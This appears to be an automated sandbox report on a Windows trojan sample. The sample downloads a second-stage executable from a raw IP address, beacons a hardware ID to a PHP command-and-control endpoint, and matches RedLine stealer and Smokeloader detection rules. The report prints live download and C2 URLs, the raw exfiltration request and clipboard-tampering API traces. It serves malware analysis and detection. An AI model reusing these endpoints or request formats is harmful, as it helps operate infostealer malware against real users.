HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 11 Dec 2024 07:56:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 11 Dec 2024 07:45:02 GMTETag: "5fa00-628f9c67d84af"Accept-Ranges: bytesContent-Length: 391680Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db 51 5d c4 9f 30 33 97 9f 30 33 97 9f 30 33 97 81 62 a6 97 86 30 33 97 81 62 b0 97 e3 30 33 97 81 62 b7 97 b5 30 33 97 b8 f6 48 97 94 30 33 97 9f 30 32 97 1f 30 33 97 81 62 b9 97 9e 30 33 97 81 62 a7 97 9e 30 33 97 81 62 a2 97 9e 30 33 97 52 69 63 68 9f 30 33 97 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 2c 91 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 5a 05 00 00 04 01 00 00 00 00 00 1f 44 00 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 25 00 00 04 00 00 64 31 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5f 05 00 78 00 00 00 00 20 06 00 b8 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e 59 05 00 00 10 00 00 00 5a 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 70 05 00 00 60 00 00 00 5e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 db 1e 00 00 20 06 00 00 3c 00 00 00 be 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKECHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 38 32 46 44 32 44 31 32 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a Data Ascii: ------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="hwid"EB82FD2D129E487256326------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="build"default------BKFCBFCBFBKEBFIDBKEC--

Source: Joe Sandbox View	IP Address: 104.21.56.70 104.21.56.70
Source: Joe Sandbox View	IP Address: 92.255.57.89 92.255.57.89
Source: Joe Sandbox View	IP Address: 176.113.115.19 176.113.115.19

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 104.21.56.70:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKECHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 38 32 46 44 32 44 31 32 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a Data Ascii: ------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="hwid"EB82FD2D129E487256326------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="build"default------BKFCBFCBFBKEBFIDBKEC--

Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000063E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: LXS5itpTK7.exe, 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: LXS5itpTK7.exe, 00000000.00000002.4483550153.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe;
Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000063E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeK
Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp, LXS5itpTK7.exe, 00000000.00000002.4483550153.000000000063E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeV
Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeo
Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exes
Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exez
Source: LXS5itpTK7.exe, 00000000.00000003.2075871383.0000000000641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/h
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp, B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89-
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp, B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php2bcf3ed6d7050e400
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpSE
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpkE
Source: B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpsition:
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000970000.00000004.00000020.00020000.00000000.sdmp, B5F8.tmp.exe, 00000002.00000002.2358508594.0000000000952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
Source: B5F8.tmp.exe, 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/s
Source: B5F8.tmp.exe, 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89IDBKEC
Source: B5F8.tmp.exe, 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89SH/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: LXS5itpTK7.exe, 00000000.00000002.4483550153.0000000000611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: LXS5itpTK7.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: LXS5itpTK7.exe, 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: LXS5itpTK7.exe, 00000000.00000002.4483550153.0000000000611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02131942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02131942

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Code function: 2_2_004097A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

2_2_004097A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.2358488571.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02132361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02132361
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02132605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02132605

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02158289	0_2_02158289
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0215ED47	0_2_0215ED47
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02144172	0_2_02144172
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_021576EB	0_2_021576EB
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0215D755	0_2_0215D755
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_021587C7	0_2_021587C7
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02157A5D	0_2_02157A5D
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0213EBDB	0_2_0213EBDB
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02146916	0_2_02146916
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0214398C	0_2_0214398C
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02166F26	0_2_02166F26
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02157FCE	0_2_02157FCE
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02148D16	0_2_02148D16
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02157D07	0_2_02157D07
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0215ED47	0_2_0215ED47
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C4B37	2_2_021C4B37

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: String function: 00404980 appears 317 times
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: String function: 02140987 appears 53 times
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: String function: 02140019 appears 121 times
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: String function: 0040FDB2 appears 125 times

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1360

Source: LXS5itpTK7.exe	Binary or memory string: OriginalFileName vs LXS5itpTK7.exe
Source: LXS5itpTK7.exe, 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs LXS5itpTK7.exe
Source: LXS5itpTK7.exe, 00000000.00000003.2075811048.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOdilemio> vs LXS5itpTK7.exe
Source: LXS5itpTK7.exe, 00000000.00000002.4483395854.0000000000473000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilemio> vs LXS5itpTK7.exe
Source: LXS5itpTK7.exe, 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs LXS5itpTK7.exe
Source: LXS5itpTK7.exe, 00000000.00000003.2027406342.0000000002210000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs LXS5itpTK7.exe
Source: LXS5itpTK7.exe	Binary or memory string: OriginalFilenamesOdilemio> vs LXS5itpTK7.exe

Source: LXS5itpTK7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000002.00000002.2358488571.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@1/3

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_005407A6 CreateToolhelp32Snapshot,Module32First,

0_2_005407A6

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Code function: 2_2_021BCE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

2_2_021BCE47

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4416

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

File created: C:\Users\user\AppData\Local\Temp\B5F8.tmp

Jump to behavior

Source: LXS5itpTK7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LXS5itpTK7.exe	ReversingLabs: Detection: 36%
Source: LXS5itpTK7.exe	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\LXS5itpTK7.exe "C:\Users\user\Desktop\LXS5itpTK7.exe"
